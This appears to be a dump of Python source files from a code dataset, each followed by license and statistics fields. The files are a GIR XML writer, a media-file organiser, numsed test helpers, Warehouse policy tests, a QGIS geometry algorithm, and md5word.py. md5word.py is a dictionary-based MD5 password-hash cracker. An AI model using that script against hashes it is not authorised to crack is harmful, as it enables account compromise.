self._write_repository(namespace, shlibs, includes, pkgs,
c_includes)
def _write_repository(self, namespace, shlibs, includes=None,
packages=None, c_includes=None):
if includes is None:
includes = frozenset()
if packages is None:
packages = frozenset()
if c_includes is None:
c_includes = frozenset()
attrs = [
('version', COMPATIBLE_GIR_VERSION),
('xmlns', 'http://www.gtk.org/introspection/core/1.0'),
('xmlns:c', 'http://www.gtk.org/introspection/c/1.0'),
('xmlns:glib', 'http://www.gtk.org/introspection/glib/1.0'),
]
with self.tagcontext('repository', attrs):
for include in sorted(includes):
self._write_include(include)
for pkg in sorted(set(packages)):
self._write_pkgconfig_pkg(pkg)
for c_include in sorted(set(c_includes)):
self._write_c_include(c_include)
self._namespace = namespace
self._write_namespace(namespace, shlibs)
self._namespace = None
def _write_include(self, include):
attrs = [('name', include.name), ('version', include.version)]
self.write_tag('include', attrs)
def _write_pkgconfig_pkg(self, package):
attrs = [('name', package)]
self.write_tag('package', attrs)
def _write_c_include(self, c_include):
attrs = [('name', c_include)]
self.write_tag('c:include', attrs)
def _write_namespace(self, namespace, shlibs):
attrs = [('name', namespace.name),
('version', namespace.version),
('shared-library', ','.join(shlibs)),
('c:identifier-prefixes', ','.join(namespace.identifier_prefixes)),
('c:symbol-prefixes', ','.join(namespace.symbol_prefixes))]
with self.tagcontext('namespace', attrs):
# We define a custom sorting function here because
# we want aliases to be first. They're a bit
# special because the typelib compiler expands them.
def nscmp(a, b):
if isinstance(a, ast.Alias):
if isinstance(b, ast.Alias):
return cmp(a.name, b.name)
else:
return -1
elif isinstance(b, ast.Alias):
return 1
else:
return cmp(a, b)
for node in sorted(namespace.itervalues(), cmp=nscmp):
self._write_node(node)
def _write_node(self, node):
if isinstance(node, ast.Function):
self._write_function(node)
elif isinstance(node, ast.Enum):
self._write_enum(node)
elif isinstance(node, ast.Bitfield):
self._write_bitfield(node)
elif isinstance(node, (ast.Class, ast.Interface)):
self._write_class(node)
elif isinstance(node, ast.Callback):
self._write_callback(node)
elif isinstance(node, ast.Record):
self._write_record(node)
elif isinstance(node, ast.Union):
self._write_union(node)
elif isinstance(node, ast.Boxed):
self._write_boxed(node)
elif isinstance(node, ast.Member):
# FIXME: atk_misc_instance singleton
pass
elif isinstance(node, ast.Alias):
self._write_alias(node)
elif isinstance(node, ast.Constant):
self._write_constant(node)
else:
print 'WRITER: Unhandled node', node
def _append_version(self, node, attrs):
if node.version:
attrs.append(('version', node.version))
def _write_generic(self, node):
for key, value in node.attributes:
self.write_tag('attribute', [('name', key), ('value', value)])
if hasattr(node, 'doc') and node.doc:
self.write_tag('doc', [('xml:whitespace', 'preserve')],
node.doc.strip())
def _append_node_generic(self, node, attrs):
if node.skip or not node.introspectable:
attrs.append(('introspectable', '0'))
if node.deprecated:
attrs.append(('deprecated', node.deprecated))
if node.deprecated_version:
attrs.append(('deprecated-version',
node.deprecated_version))
def _append_throws(self, func, attrs):
if func.throws:
attrs.append(('throws', '1'))
def _write_alias(self, alias):
attrs = [('name', alias.name)]
if alias.ctype is not None:
attrs.append(('c:type', alias.ctype))
self._append_node_generic(alias, attrs)
with self.tagcontext('alias', attrs):
self._write_generic(alias)
self._write_type_ref(alias.target)
def _write_callable(self, callable, tag_name, extra_attrs):
attrs = [('name', callable.name)]
attrs.extend(extra_attrs)
self._append_version(callable, attrs)
self._append_node_generic(callable, attrs)
self._append_throws(callable, attrs)
with self.tagcontext(tag_name, attrs):
self._write_generic(callable)
self._write_return_type(callable.retval, parent=callable)
self._write_parameters(callable, callable.parameters)
def _write_function(self, func, tag_name='function'):
attrs = []
if hasattr(func, 'symbol'):
attrs.append(('c:identifier', func.symbol))
if func.shadowed_by:
attrs.append(('shadowed-by', func.shadowed_by))
elif func.shadows:
attrs.append(('shadows', func.shadows))
self._write_callable(func, tag_name, attrs)
def _write_method(self, method):
self._write_function(method, tag_name='method')
def _write_static_method(self, method):
self._write_function(method, tag_name='function')
def _write_constructor(self, method):
self._write_function(method, tag_name='constructor')
def _write_return_type(self, return_, parent=None):
if not return_:
return
attrs = []
if return_.transfer:
attrs.append(('transfer-ownership', return_.transfer))
if return_.skip:
attrs.append(('skip', '1'))
with self.tagcontext('return-value', attrs):
self._write_generic(return_)
self._write_type(return_.type, function=parent)
def _write_parameters(self, parent, parameters):
if not parameters:
return
with self.tagcontext('parameters'):
for parameter in parameters:
self._write_parameter(parent, parameter)
def _write_parameter(self, parent, parameter):
attrs = []
if parameter.argname is not None:
attrs.append(('name', parameter.argname))
if (parameter.direction is not None) and (parameter.direction != 'in'):
attrs.append(('direction', parameter.direction))
attrs.append(('caller-allocates',
'1' if parameter.caller_allocates else '0'))
if parameter.transfer:
attrs.append(('transfer-ownership',
parameter.transfer))
if parameter.allow_none:
attrs.append(('allow-none', '1'))
if parameter.scope:
attrs.append(('scope', parameter.scope))
if parameter.closure_name is not None:
idx = parent.get_parameter_index(parameter.closure_name)
attrs.append(('closure', '%d' % (idx, )))
if parameter.destroy_name is not None:
idx = parent.get_parameter_index(parameter.destroy_name)
attrs.append(('destroy', '%d' % (idx, )))
if parameter.skip:
attrs.append(('skip', '1'))
with self.tagcontext('parameter', attrs):
self._write_generic(parameter)
self._write_type(parameter.type, function=parent)
def _type_to_name(self, typeval):
if not typeval.resolved:
raise AssertionError("Caught unresolved type %r (ctype=%r)" % (typeval, typeval.ctype))
assert typeval.target_giname is not None
prefix = self._namespace.name + '.'
if typeval.target_giname.startswith(prefix):
return typeval.target_giname[len(prefix):]
return typeval.target_giname
def _write_type_ref(self, ntype):
""" Like _write_type, but only writes the type name rather than the full details """
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
else:
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
attrs.insert(0, ('name', ntype.target_fundamental))
self.write_tag('type', attrs)
def _write_type(self, ntype, relation=None, function=None):
assert isinstance(ntype, ast.Type), ntype
attrs = []
if ntype.ctype:
attrs.append(('c:type', ntype.ctype))
if isinstance(ntype, ast.Varargs):
with self.tagcontext('varargs', []):
pass
elif isinstance(ntype, ast.Array):
if ntype.array_type != ast.Array.C:
attrs.insert(0, ('name', ntype.array_type))
# we insert an explicit 'zero-terminated' attribute
# when it is false, or when it would not be implied
# by the absence of length and fixed-size
if not ntype.zeroterminated:
attrs.insert(0, ('zero-terminated', '0'))
elif (ntype.zeroterminated
and (ntype.size is not None or ntype.length_param_name is not None)):
attrs.insert(0, ('zero-terminated', '1'))
if ntype.size is not None:
attrs.append(('fixed-size', '%d' % (ntype.size, )))
if ntype.length_param_name is not None:
assert function
attrs.insert(0, ('length', '%d'
% (function.get_parameter_index(ntype.length_param_name, ))))
with self.tagcontext('array', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.List):
if ntype.name:
attrs.insert(0, ('name', ntype.name))
with self.tagcontext('type', attrs):
self._write_type(ntype.element_type)
elif isinstance(ntype, ast.Map):
attrs.insert(0, ('name', 'GLib.HashTable'))
with self.tagcontext('type', attrs):
self._write_type(ntype.key_type)
self._write_type(ntype.value_type)
else:
# REWRITEFIXME - enable this for 1.2
if ntype.target_giname:
attrs.insert(0, ('name', self._type_to_name(ntype)))
elif ntype.target_fundamental:
# attrs = [('fundamental', ntype.target_fundamental)]
attrs.insert(0, ('name', ntype.target_fundamental))
elif ntype.target_foreign:
attrs.insert(0, ('foreign', '1'))
self.write_tag('type', attrs)
def _append_registered(self, node, attrs):
assert isinstance(node, ast.Registered)
if node.get_type:
attrs.extend([('glib:type-name', node.gtype_name),
('glib:get-type', node.get_type)])
def _write_enum(self, enum):
attrs = [('name', enum.name)]
self._append_version(enum, attrs)
self._append_node_generic(enum, attrs)
self._append_registered(enum, attrs)
attrs.append(('c:type', enum.ctype))
if enum.error_quark:
attrs.append(('glib:error-quark', enum.error_quark))
with self.tagcontext('enumeration', attrs):
self._write_generic(enum)
for member in enum.members:
self._write_member(member)
def _write_bitfield(self, bitfield):
attrs = [('name', bitfield.name)]
self._append_version(bitfield, attrs)
self._append_node_generic(bitfield, attrs)
self._append_registered(bitfield, attrs)
attrs.append(('c:type', bitfield.ctype))
with self.tagcontext('bitfield', attrs):
self._write_generic(bitfield)
for member in bitfield.members:
self._write_member(member)
def _write_member(self, member):
attrs = [('name', member.name),
('value', str(member.value)),
('c:identifier', member.symbol)]
if member.nick is not None:
attrs.append(('glib:nick', member.nick))
self.write_tag('member', attrs)
def _write_constant(self, constant):
attrs = [('name', constant.name), ('value', constant.value)]
with self.tagcontext('constant', attrs):
self._write_type(constant.value_type)
def _write_class(self, node):
attrs = [('name', node.name),
('c:symbol-prefix', node.c_symbol_prefix),
('c:type', node.ctype)]
self._append_version(node, attrs)
self._append_node_generic(node, attrs)
if isinstance(node, ast.Class):
tag_name = 'class'
if node.parent is not None:
attrs.append(('parent',
self._type_to_name(node.parent)))
if node.is_abstract:
attrs.append(('abstract', '1'))
else:
assert isinstance(node, ast.Interface)
tag_name = 'interface'
attrs.append(('glib:type-name', node.gtype_name))
if node.get_type is not None:
attrs.append(('glib:get-type', node.get_type))
if node.glib_type_struct is not None:
attrs.append(('glib:type-struct',
self._type_to_name(node.glib_type_struct)))
if isinstance(node, ast.Class):
if node.fundamental:
attrs.append(('glib:fundamental', '1'))
if node.ref_func:
attrs.append(('glib:ref-func', node.ref_func))
if node.unref_func:
attrs.append(('glib:unref-func', node.unref_func))
if node.set_value_func:
attrs.append(('glib:set-value-func', node.set_value_func))
if node.get_value_func:
attrs.append(('glib:get-value-func', node.get_value_func))
with self.tagcontext(tag_name, attrs):
self._write_generic(node)
if isinstance(node, ast.Class):
for iface in sorted(node.interfaces):
self.write_tag('implements',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Interface):
for iface in sorted(node.prerequisites):
self.write_tag('prerequisite',
[('name', self._type_to_name(iface))])
if isinstance(node, ast.Class):
for method in sorted(node.constructors):
self._write_constructor(method)
if isinstance(node, (ast.Class, ast.Interface)):
for method in sorted(node.static_methods):
self._write_static_method(method)
for vfunc in sorted(node.virtual_methods):
self._write_vfunc(vfunc)
for method in sorted(node.methods):
self._write_method(method)
for prop in sorted(node.properties):
self._write_property(prop)
for field in node.fields:
self._write_field(field)
for signal in sorted(node.signals):
self._write_signal(signal)
def _write_boxed(self, boxed):
attrs = [('glib:name', boxed.name)]
if boxed.c_symbol_prefix is not None:
attrs.append(('c:symbol-prefix', boxed.c_symbol_prefix))
self._append_registered(boxed, attrs)
with self.tagcontext('glib:boxed', attrs):
self._write_generic(boxed)
for method in sorted(boxed.constructors):
self._write_constructor(method)
for method in sorted(boxed.methods):
self._write_method(method)
for method in sorted(boxed.static_methods):
self._write_static_method(method)
def _write_property(self, prop):
attrs = [('name', prop.name)]
self._append_version(prop, attrs)
self._append_node_generic(prop, attrs)
# Properties are assumed to be readable (see also generate.c)
if not prop.readable:
attrs.append(('readable', '0'))
if prop.writable:
attrs.append(('writable', '1'))
if prop.construct:
attrs.append(('construct', '1'))
if prop.construct_only:
attrs.append(('construct-only', '1'))
if prop.transfer:
attrs.append(('transfer-ownership', prop.transfer))
with self.tagcontext('property', attrs):
self._write_generic(prop)
self._write_type(prop.type)
def _write_vfunc(self, vf):
attrs = []
if vf.invoker:
attrs.append(('invoker', vf.invoker))
self._write_callable(vf, 'virtual-method', attrs)
def _write_callback(self, callback):
attrs = []
if callback.namespace:
attrs.append(('c:type', callback.ctype or callback.c_name))
self._write_callable(callback, 'callback', attrs)
def _write_record(self, record, extra_attrs=[]):
is_gtype_struct = False
attrs = list(extra_attrs)
if record.name is not None:
attrs.append(('name', record.name))
if record.ctype is not None: # the record might be anonymous
attrs.append(('c:type', record.ctype))
if record.disguised:
attrs.append(('disguised', '1'))
if record.foreign:
attrs.append(('foreign', '1'))
if record.is_gtype_struct_for is not None:
is_gtype_struct = True
attrs.append(('glib:is-gtype-struct-for',
self._type_to_name(record.is_gtype_struct_for)))
self._append_version(record, attrs)
self._append_node_generic(record, attrs)
self._append_registered(record, attrs)
if record.c_symbol_prefix:
attrs.append(('c:symbol-prefix', record.c_symbol_prefix))
with self.tagcontext('record', attrs):
self._write_generic(record)
if record.fields:
for field in record.fields:
self._write_field(field, is_gtype_struct)
for method in sorted(record.constructors):
self._write_constructor(method)
for method in sorted(record.methods):
self._write_method(method)
for method in sorted(record.static_methods):
self._write_static_method(method)
def _write_union(self, union):
attrs = []
if union.name is not None:
attrs.append(('name', union.name))
if union.ctype is not None: # the union might be anonymous
attrs.append(('c:type', union.ctype))
self._append_version(union, attrs)
self._append_node_generic(union, attrs)
self._append_registered(union, attrs)
if union.c_symbol_prefix:
attrs.append(('c:symbol-prefix', union.c_symbol_prefix))
with self.tagcontext('union', attrs):
self._write_generic(union)
if union.fields:
for field in union.fields:
self._write_field(field)
for method in sorted(union.constructors):
self._write_constructor(method)
for method in sorted(union.methods):
self._write_method(method)
for method in sorted(union.static_methods):
self._write_static_method(method)
def _write_field(self, field, is_gtype_struct=False):
if field.anonymous_node:
if isinstance(field.anonymous_node, ast.Callback):
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
with self.tagcontext('field', attrs):
self._write_callback(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Record):
self._write_record(field.anonymous_node)
elif isinstance(field.anonymous_node, ast.Union):
self._write_union(field.anonymous_node)
else:
raise AssertionError("Unknown field anonymous: %r" \
% (field.anonymous_node, ))
else:
attrs = [('name', field.name)]
self._append_node_generic(field, attrs)
# Fields are assumed to be read-only
# (see also girparser.c and generate.c)
if not field.readable:
attrs.append(('readable', '0'))
if field.writable:
attrs.append(('writable', '1'))
if field.bits:
attrs.append(('bits', str(field.bits)))
if field.private:
attrs.append(('private', '1'))
with self.tagcontext('field', attrs):
self._write_generic(field)
self._write_type(field.type)
def _write_signal(self, signal):
attrs = [('name', signal.name)]
self._append_version(signal, attrs)
self._append_node_generic(signal, attrs)
with self.tagcontext('glib:signal', attrs):
self._write_generic(signal)
self._write_return_type(signal.retval)
self._write_parameters(signal, signal.parameters)
|
gpl-2.0
| 7,605,723,460,842,861,000
| 41.477718
| 99
| 0.565883
| false
| 4.137153
| false
| false
| false
|
PlainStupid/PlainCleanUp
|
CleanUp/FinalSol.py
|
1
|
9335
|
import re
import os
import shutil
import sys
# Regexes are in from most used to least used regex for
# a given file pattern.
regexShow = [
'''
# Matches with Show.S01E10.mp4
^ #Beginning of a string
(?P<ShowName>.+?) #Show name
[\.\_\-\s]+ #If it has dot, underscore or dash
(?:s\s*|season\s*) #Case if starts with s or season
(?P<SeasonNumber>\d+) #Show Season number
[. _-]*
(?:e\s*|episode\s*) #Case if starts with e or episode
(?P<EpisodeNumber>\d+) #Show episode number
[. _-]*
''',
'''
# Matches Show.Name -12x12.avi
^
(?P<ShowName>.+)
#Show name
[._-]+ # char between show name and season number
(?P<SeasonNumber>\d+)
#Season number
x #x between season and episode number
(?P<EpisodeNumber>\d+)
#Episode number
''',
'''
# Matches Show - [01x10].mp4
^
(?P<ShowName>.+)
\s*[-]*\s*\[
(?P<SeasonNumber>\d+) #Season number
x
(?P<EpisodeNumber>\d+)#Episode number
]
''',
'''
# Matches Show.Name.812.mp4
^
(?P<ShowName>.+?)
[. _-]+
(?P<SeasonNumber>\d{1,2}) #Season number
(?P<EpisodeNumber>\d{2}) #Episode number
''',
'''
# Matches with Show03e10.mp4
# eg. santi-dexterd07e10.hdrip.xvid
^(?P<ShowName>.{2,}) #Show name
(?P<SeasonNumber>\d.+) #Season number
(?:e|episode)(?P<EpisodeNumber>\d+) #Episode number
'''
]
ignoreRegex = {'sample': '(^|[\W_])(sample\d*)[\W_]',
'photos': '^AlbumArt.+{.+}'}
videoextensions = [ 'avi', 'mp4', 'mkv', 'mpg', '.mp3',
'm4v', 'divx', 'rm', 'mpeg', 'wmv',
'ogm', 'iso', 'img', 'm2ts', 'ts',
'flv', 'f4v', 'mov', 'rmvb', 'vob',
'dvr-ms', 'wtv', 'ogv', '3gp', 'xvid'
]
subExtensions = ['srt', 'idx' 'sub']
otherExtension = ['nfo']
photoExtensions = ['jpg', 'jpeg', 'bmp', 'tbn']
junkFiles = ['.torrent', '.dat', '.url', '.txt', '.sfv']
showsFolder = 'Shows'
def cleanUp(dirty_dir, clean_dir):
# Absolute path to the dirty directory
dirtyDir = os.path.abspath(dirty_dir)
# Absolute path to the clean directory
cleanDir = os.path.abspath(clean_dir)
theShowDir = os.path.join(cleanDir, showsFolder)
for subdir, dirs, files in os.walk(dirtyDir):
# Scan every file in dirtyDir
for file in files:
# Get the file name and its extension
file_name, file_extension = os.path.splitext(file)
# Absolute path to the old file
oldFile = os.path.abspath(os.path.join(subdir, file))
# Run through every regular expression, from best match to least match
for y in regexShow:
# First we compile the regular expression
showReg = re.compile(y, re.IGNORECASE | re.MULTILINE | re.VERBOSE)
# Get the show name if it exists
showName = showReg.match(file)
# We don't want sample files so we check if the current file is
# a sample file
isSample = re.search(ignoreRegex['sample'], file)
#
ignPhotos = re.match(ignoreRegex['photos'], file)
# Check the shows files based on their extension and if they are not
# a sample file
if showName and not isSample and allowedExt(file_extension):
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Check the photos since we don't want all photos, eg. AlbumArt_....
if showName and not isSample and not ignPhotos and file_extension[1:] in photoExtensions:
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Remove the file if it has junk extension
if file_extension in junkFiles:
if os.path.exists(oldFile):
os.remove(oldFile)
# Go and clean the dirty folder, that is remove all empty folders
cleanEmptyDirtyDir(dirtyDir)
# Give the user a satisfying word
print('Done')
def cleanEmptyDirtyDir(dirtyDir):
# get number of subdirectories
curr = len([x[0] for x in os.walk(dirtyDir)])
while True:
# remove all empty dirs
remove_all_empty_dirs(dirtyDir)
temp = len([x[0] for x in os.walk(dirtyDir)])
# if no empty directory was found we stop
if curr == temp:
break
curr = temp
def allowedExt(file_extension):
"""
:argument File extension
:returns Returns true if the file extension is in current extensions groups
"""
# Get the file extension without the dot
fileExt = file_extension[1:]
# Return True if it exist in extensions groups
return (fileExt in subExtensions or
fileExt in videoextensions or
fileExt in otherExtension)
def cleanShowName(file):
"""
:argument Original file name(string)
:returns Returns clean show name, eg. Show Name
"""
return re.sub('\.|-|_', ' ', file.group('ShowName')).strip().title()
def dottedShowName(file):
"""
:argument Original file name(string)
:returns Returns dotted show name, eg. Show.Name
"""
return re.sub('-|_|\s', '.', file.group('ShowName')).strip().title()
def mkFullMovieDir(fullDir, newfile):
movieName = newfile.group('MovieName')
movieYear = newfile.group('MovieYear')
pathName = '%s (%s)' % (movieName, movieYear)
newPath = os.path.join(fullDir, pathName)
if not os.path.isdir(newPath):
if os.path.isfile(newPath):
raise OSError('A file with the same name as the folder already exist: %s' % (newPath))
else:
try:
os.makedirs(newPath)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (newPath))
pass
def moveTvFile(clean_dir, oldFile, newFile):
"""
:argument Path to the clean directory, old file including its path, regex file
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(newFile)
# And the season number
seasonNumber = int(newFile.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Get the base name of the old file - ./dirty/Seasn9/TheFileS##E##.avi -> TheFileS##E##.avi
oldFileName = os.path.basename(oldFile)
# New file path to the clean folder - ./clean/Show Name/Season ##/TheFile.avi
newFilePath = os.path.join(fullDir, oldFileName)
# If it doesn't exist we rename it, otherwise just notify user about it
if not os.path.isfile(newFilePath):
shutil.move(oldFile, newFilePath)
else:
print('The old file exist in new path:',oldFile)
pass
def mkFullShowDir(clean_dir, file):
"""
:argument Original file name(string)
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(file)
# And the season number
seasonNumber = int(file.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Create the folder if it doesn't exist, raise error if there is a file
# with the same name
if not os.path.isdir(fullDir):
if os.path.isfile(fullDir):
raise OSError('A file with the same name as the folder already exist: %s' % (fullDir))
else:
try:
os.makedirs(fullDir)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (fullDir))
pass
def remove_all_empty_dirs(path_to_curr_dir):
"""
:argument Path to dirty directory
:returns Nothing
"""
# check if path exists
if not os.path.isdir(path_to_curr_dir):
return
# get all items in the current directory
items = os.listdir(path_to_curr_dir)
# if directory is not empty, we call recursively for each item
if items:
for item in items:
abs_path = os.path.join(path_to_curr_dir, item)
remove_all_empty_dirs(abs_path)
# Empty folder removed
else:
os.rmdir(path_to_curr_dir)
if __name__ == "__main__":
cleanUp(sys.argv[1], sys.argv[2])
|
mit
| 6,587,270,393,259,099,000
| 30.12
| 105
| 0.582217
| false
| 3.830529
| false
| false
| false
|
GillesArcas/numsed
|
numsed/common.py
|
1
|
2941
|
from __future__ import print_function
import sys
import os
import subprocess
import time
try:
from StringIO import StringIO # Python2
except ImportError:
from io import StringIO # Python3
PY2 = sys.version_info < (3,)
PY3 = sys.version_info > (3,)
TMP_SED = 'tmp.sed'
TMP_INPUT = 'tmp.input'
TMP_PY = 'tmp.py'
class NumsedConversion:
def __init__(self, source, transformation):
self.source = source
self.transformation = transformation
def trace(self):
return ''
def run(self, verbose=True):
return ''
def coverage(self):
return 'Coverage not implemented for current conversion.'
class ListStream:
def __enter__(self):
self.result = StringIO()
sys.stdout = self.result
return self
def __exit__(self, ext_type, exc_value, traceback):
sys.stdout = sys.__stdout__
def stringlist(self):
return self.result.getvalue().splitlines()
def singlestring(self):
return self.result.getvalue()
def run(cmd, echo=True):
try:
p = subprocess.Popen(cmd.split(),
#shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except:
print('Unable to start', cmd)
exit(1)
res = []
while True:
line = p.stdout.readline()
line = line.decode('ascii') # py3
if line == '':
break
else:
line = line.rstrip('\n\r')
res.append(line)
if echo:
print(line)
return '\n'.join(res)
def testlines(name):
'''
yield each test in a test suite
'''
lines = []
result = None
dest = lines
with open(name) as f:
for line in f:
if line.startswith('#') and '===' in line:
result = []
dest = result
elif line.startswith('#') and '---' in line:
yield lines, result
lines = []
result = None
dest = lines
else:
dest.append(line)
def list_compare(tag1, tag2, list1, list2):
# make sure both lists have same length
maxlen = max(len(list1), len(list2))
list1.extend([''] * (maxlen - len(list1)))
list2.extend([''] * (maxlen - len(list2)))
# with open('list1.txt', 'w') as f:
# for line in list1:
# print>>f, line
# with open('list2.txt', 'w') as f:
# for line in list2:
# print>>f, line
diff = list()
res = True
for i, (x, y) in enumerate(zip(list1, list2)):
if x != y:
diff.append('line %s %d: %s' % (tag1, i + 1, x))
diff.append('line %s %d: %s' % (tag2, i + 1, y))
res = False
return res, diff
def hasextension(filename, *ext):
return os.path.splitext(filename)[1].lower() in [_.lower() for _ in ext]
|
mit
| 6,023,549,609,253,550,000
| 23.923729
| 76
| 0.524651
| false
| 3.76087
| false
| false
| false
|
dstufft/warehouse
|
tests/unit/test_policy.py
|
1
|
2168
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pretend
from warehouse import policy
def test_markdown_view(tmpdir):
tmpdir = str(tmpdir)
filename = "test.md"
with open(os.path.join(tmpdir, filename), "w", encoding="utf8") as fp:
fp.write("# This is my Test\n\nIt is a great test.\n")
view = policy.markdown_view_factory(filename=filename)
request = pretend.stub(registry=pretend.stub(settings={"policy.directory": tmpdir}))
result = view(request)
assert result == {
"title": "This is my Test",
"html": "<h1>This is my Test</h1>\n<p>It is a great test.</p>\n",
}
def test_add_policy_view(monkeypatch):
md_view = pretend.stub()
markdown_view_factory = pretend.call_recorder(lambda filename: md_view)
monkeypatch.setattr(policy, "markdown_view_factory", markdown_view_factory)
config = pretend.stub(
add_route=pretend.call_recorder(lambda *a, **kw: None),
add_view=pretend.call_recorder(lambda *a, **kw: None),
)
policy.add_policy_view(config, "my-policy", "mine.md")
assert config.add_route.calls == [
pretend.call("policy.my-policy", "/policy/my-policy/")
]
assert config.add_view.calls == [
pretend.call(md_view, route_name="policy.my-policy", renderer="policy.html")
]
assert markdown_view_factory.calls == [pretend.call(filename="mine.md")]
def test_includeme():
config = pretend.stub(add_directive=pretend.call_recorder(lambda *a, **kw: None))
policy.includeme(config)
assert config.add_directive.calls == [
pretend.call("add_policy", policy.add_policy_view, action_wrap=False)
]
|
apache-2.0
| -2,289,942,341,886,902,800
| 31.358209
| 88
| 0.683118
| false
| 3.554098
| true
| false
| false
|
knightmare2600/d4rkc0de
|
encryption/md5word.py
|
1
|
1132
|
#!/usr/bin/python
#Uses all wordlists in a dir to crack a hash.
#
#www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import md5, sys, os, time
def getwords(wordlist):
try:
file = open(wordlist, "r")
words = file.readlines()
file.close()
except(IOError),msg:
words = ""
print "Error:",msg
pass
return words
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) != 3:
print "Usage: ./md5word.py <hash> <wordlist dir>"
sys.exit(1)
pw = sys.argv[1]
wordlists = os.listdir(sys.argv[2])
print "\n d3hydr8[at]gmail[dot]com md5word v1.0"
print "-----------------------------------------"
print "\n[+] Hash:",pw
print "[+] Wordlists Loaded:",len(wordlists)
print "[+] Started:",timer(),"\n"
for lst in wordlists:
words = getwords(os.path.join(sys.argv[2],lst))
print "[+] List:",lst," Length:",len(words),"loaded"
for word in words:
hash = md5.new(word[:-1]).hexdigest()
if pw == hash:
print "\n[+] Found Password:",os.path.join(sys.argv[2],lst)
print "[!] Password is:",word
print "\n[+] Done:",timer()
sys.exit(1)
print "\n[+] Done:",timer()
|
gpl-2.0
| 3,432,820,828,723,467,000
| 19.581818
| 62
| 0.605124
| false
| 2.584475
| false
| false
| false
|
gioman/QGIS
|
python/plugins/processing/algs/qgis/SinglePartsToMultiparts.py
|
1
|
4039
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SinglePartsToMultiparts.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.PyQt.QtGui import QIcon
from qgis.core import QgsFeature, QgsGeometry, QgsWkbTypes, QgsProcessingUtils, NULL
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class SinglePartsToMultiparts(GeoAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OUTPUT = 'OUTPUT'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'ftools', 'single_to_multi.png'))
def group(self):
return self.tr('Vector geometry tools')
def name(self):
return 'singlepartstomultipart'
def displayName(self):
return self.tr('Singleparts to multipart')
def defineCharacteristics(self):
self.addParameter(ParameterVector(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterTableField(self.FIELD,
self.tr('Unique ID field'), self.INPUT))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Multipart')))
def processAlgorithm(self, context, feedback):
layer = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.INPUT), context)
fieldName = self.getParameterValue(self.FIELD)
geomType = QgsWkbTypes.multiType(layer.wkbType())
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(layer.fields(), geomType, layer.crs(),
context)
outFeat = QgsFeature()
inGeom = QgsGeometry()
index = layer.fields().lookupField(fieldName)
collection_geom = {}
collection_attrs = {}
features = QgsProcessingUtils.getFeatures(layer, context)
total = 100.0 / QgsProcessingUtils.featureCount(layer, context)
for current, feature in enumerate(features):
atMap = feature.attributes()
idVar = atMap[index]
if idVar in [None, NULL]:
outFeat.setAttributes(atMap)
outFeat.setGeometry(feature.geometry())
writer.addFeature(outFeat)
feedback.setProgress(int(current * total))
continue
key = str(idVar).strip()
if key not in collection_geom:
collection_geom[key] = []
collection_attrs[key] = atMap
inGeom = feature.geometry()
collection_geom[key].append(inGeom)
feedback.setProgress(int(current * total))
for key, geoms in collection_geom.items():
outFeat.setAttributes(collection_attrs[key])
outFeat.setGeometry(QgsGeometry.collectGeometry(geoms))
writer.addFeature(outFeat)
del writer
|
gpl-2.0
| 3,639,953,806,379,038,000
| 35.0625
| 107
| 0.564001
| false
| 4.631881
